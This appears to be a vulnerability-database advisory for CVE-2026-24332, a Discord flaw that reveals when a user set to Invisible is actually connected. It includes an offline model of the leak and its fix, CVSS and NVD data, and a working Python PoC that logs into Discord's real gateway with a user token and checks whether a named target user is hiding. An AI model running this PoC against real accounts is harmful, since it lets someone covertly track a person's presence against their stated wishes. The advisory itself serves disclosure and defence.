Security Vulnerability Report
CVE-2026-24332 CVSS 4.3 MEDIUM

CVE-2026-24332

Published: 2026-01-22 08:16:01
Last Modified: 2026-04-15 00:35:42

Description

Discord through 2026-01-16 allows gathering information about whether a user's client state is Invisible (and not actually offline) because the response to a WebSocket API request includes the user in the presences array (with "status": "offline"), whereas offline users are omitted from the presences array. This is arguably inconsistent with the UI description of Invisible as "You will appear offline."
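The weakness the description relies on is an observable response discrepancy (CWE-204, as the record itself tags it): one server-side mapping emits Invisible users with `"status": "offline"` and drops truly offline users, so the mere presence of a user object in the array becomes an oracle. The following is an added example, not Discord's code and not part of the original advisory; `SERVER_STATE`, `presences_leaky`, `presences_fixed`, `classify` and `oracle_distinguishes` are hypothetical names, the sample member states are constructed, and the two response builders are illustrative models of the behaviour the description implies and of a non-leaking alternative.

```python
"""CVE-2026-24332 modelled offline: the leaky presences response beside a
hardened one, and the client-side inference that turns the leak into an oracle.

Constructed sample data, not captured gateway traffic; the server-side builders
are illustrative models, not Discord's implementation.
"""
from __future__ import annotations

from typing import Callable, Dict, List, Literal

ClientState = Literal["online", "idle", "dnd", "invisible", "offline"]
Presence = Dict[str, object]

# Constructed sample: the real client state the server knows for each member.
SERVER_STATE: Dict[str, ClientState] = {
    "100": "online",
    "200": "invisible",
    "300": "offline",
    "400": "dnd",
}


def presences_leaky(state: Dict[str, ClientState]) -> List[Presence]:
    """Model of the reported behaviour: Invisible members are rewritten to
    status 'offline' but still emitted, while truly offline members are omitted.
    The two cases therefore produce different responses."""
    out: List[Presence] = []
    for uid, s in state.items():
        if s == "offline":
            continue
        out.append({"user": {"id": uid}, "status": "offline" if s == "invisible" else s})
    return out


def presences_fixed(state: Dict[str, ClientState]) -> List[Presence]:
    """Hardened model: Invisible is handled exactly like offline at the point
    where the array is built, so an observer sees one response for both."""
    return [
        {"user": {"id": uid}, "status": s}
        for uid, s in state.items()
        if s not in ("invisible", "offline")
    ]


def classify(presences: List[Presence], user_id: str) -> str:
    """What an observer can conclude about `user_id` from one presences array:
    'invisible' (listed with status offline), the visible status string, or
    'offline' (absent from the array)."""
    for p in presences:
        if p["user"]["id"] == user_id:  # type: ignore[index]
            return "invisible" if p["status"] == "offline" else str(p["status"])
    return "offline"


def oracle_distinguishes(build: Callable[[Dict[str, ClientState]], List[Presence]]) -> bool:
    """True when the given builder lets an observer separate the Invisible
    member ('200') from the truly offline one ('300')."""
    response = build(SERVER_STATE)
    return classify(response, "200") != classify(response, "300")


if __name__ == "__main__":
    for name, build in (("leaky", presences_leaky), ("fixed", presences_fixed)):
        resp = build(SERVER_STATE)
        print(f"{name}: user 200 -> {classify(resp, '200')}, user 300 -> {classify(resp, '300')}, "
              f"distinguishable={oracle_distinguishes(build)}")
```

The fix is deliberately placed in the response builder rather than in the client: a user-facing promise such as "You will appear offline" only holds if every server-side path that serialises presence treats Invisible and offline identically, because any path that still emits the user object reopens the oracle regardless of what status string it carries.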

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No CPE configuration data is published for this record; the NVD entry is tagged exclusively-hosted-service, so there is no installable version to enumerate.

Discord through 2026-01-16 (the hosted service as observed up to and including that date)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import asyncio
import json

import websockets

GATEWAY = "wss://gateway.discord.gg/?v=10&encoding=json"


def _iter_presences(obj):
    """Recursively yield dicts shaped like presence objects
    ({"user": {"id": ...}, "status": ...}) from whatever event wraps them
    (READY and GUILD_CREATE carry a top-level presences array; the reply to
    the op 14 subscription nests presence objects inside member items)."""
    if isinstance(obj, dict):
        if isinstance(obj.get("user"), dict) and "status" in obj:
            yield obj
        for v in obj.values():
            yield from _iter_presences(v)
    elif isinstance(obj, list):
        for v in obj:
            yield from _iter_presences(v)


async def check_user_invisible_status(user_token: str, guild_id: str,
                                      target_user_id: str, timeout: float = 15.0):
    """
    PoC for CVE-2026-24332: Discord Invisible status detection.

    An Invisible user is still emitted in presences arrays (with
    "status": "offline"), whereas a truly offline user is omitted.
    Returns True if the target looks Invisible, False if they never appear
    (truly offline, or not a member of the guild), or the visible status
    string ("online", "idle", "dnd") if they are not hiding at all.
    """
    async with websockets.connect(GATEWAY, max_size=None) as ws:
        # Step 1: the gateway speaks first with op 10 (Hello). Identify must be
        # sent after it, not blindly on connect, or the first frame we read
        # back is the Hello rather than any presence data.
        hello = json.loads(await ws.recv())
        if hello.get("op") != 10:
            raise RuntimeError(f"unexpected first gateway frame: {hello}")

        # Step 2: Identify with the user token. Gateway v10 property keys are
        # "os"/"browser"/"device" (the "$os" spelling is the legacy v6 form).
        identify = {
            "op": 2,
            "d": {
                "token": user_token,
                "properties": {"os": "windows", "browser": "Chrome", "device": ""},
            },
        }
        await ws.send(json.dumps(identify))

        # Step 3: request the guild's presences (op 14, the client's lazy
        # guild-subscription request used by the original PoC).
        subscribe = {
            "op": 14,
            "d": {
                "guild_id": guild_id,
                "typing": True,
                "activities": True,
                "channels": {guild_id: []},
            },
        }
        await ws.send(json.dumps(subscribe))

        # Step 4: scan dispatch events (op 0) until the target shows up in a
        # presences array or the deadline passes. A user who is visibly
        # online/idle/dnd is reported as such rather than as "truly offline".
        loop = asyncio.get_running_loop()
        deadline = loop.time() + timeout
        while loop.time() < deadline:
            raw = await asyncio.wait_for(ws.recv(), timeout=deadline - loop.time())
            event = json.loads(raw)
            if event.get("op") != 0:
                continue
            for presence in _iter_presences(event.get("d") or {}):
                if presence["user"].get("id") != target_user_id:
                    continue
                status = presence.get("status")
                if status == "offline":
                    print(f"[!] User {target_user_id} is listed with status offline -> likely INVISIBLE")
                    return True
                print(f"[*] User {target_user_id} is visibly {status}")
                return status

        print(f"[*] User {target_user_id} never appeared in a presences array "
              f"-> truly offline (or not in guild {guild_id})")
        return False


# Run the PoC (short-lived connection, so no heartbeat loop is needed)
if __name__ == "__main__":
    asyncio.run(check_user_invisible_status("YOUR_TOKEN", "TARGET_GUILD_ID", "TARGET_USER_ID"))
```

References

https://xmrcat.org/discord-invisibility-bypass (the only reference listed in the NVD record below)
Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24332", "sourceIdentifier": "[email protected]", "published": "2026-01-22T08:16:00.857", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["exclusively-hosted-service"]}], "descriptions": [{"lang": "en", "value": "Discord through 2026-01-16 allows gathering information about whether a user's client state is Invisible (and not actually offline) because the response to a WebSocket API request includes the user in the presences array (with \"status\": \"offline\"), whereas offline users are omitted from the presences array. This is arguably inconsistent with the UI description of Invisible as \"You will appear offline.\""}, {"lang": "es", "value": "Discord hasta el 16 de enero de 2026 permite recopilar información sobre si el estado del cliente de un usuario es Invisible (y no realmente fuera de línea) porque la respuesta a una solicitud de API de WebSocket incluye al usuario en el array de presencias (con 'status': 'offline'), mientras que los usuarios fuera de línea son omitidos del array de presencias. Esto es discutiblemente inconsistente con la descripción de la interfaz de usuario de Invisible como 'Aparecerás fuera de línea'."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-204"}]}], "references": [{"url": "https://xmrcat.org/discord-invisibility-bypass", "source": "[email protected]"}]}}